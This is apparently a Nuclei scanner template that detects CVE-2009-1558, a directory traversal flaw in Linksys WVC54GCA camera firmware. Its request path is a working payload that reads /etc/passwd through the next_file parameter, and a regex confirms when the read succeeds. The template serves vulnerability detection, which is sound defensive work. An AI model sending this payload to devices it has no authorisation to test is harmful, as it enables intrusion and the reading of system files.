id: CVE-2009-1558 info: name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal author: daffainfo severity: high description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. reference: https://www.exploit-db.com/exploits/32954 tags: cve,cve2009,iot,lfi requests: - method: GET path: - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" - type: status status: - 200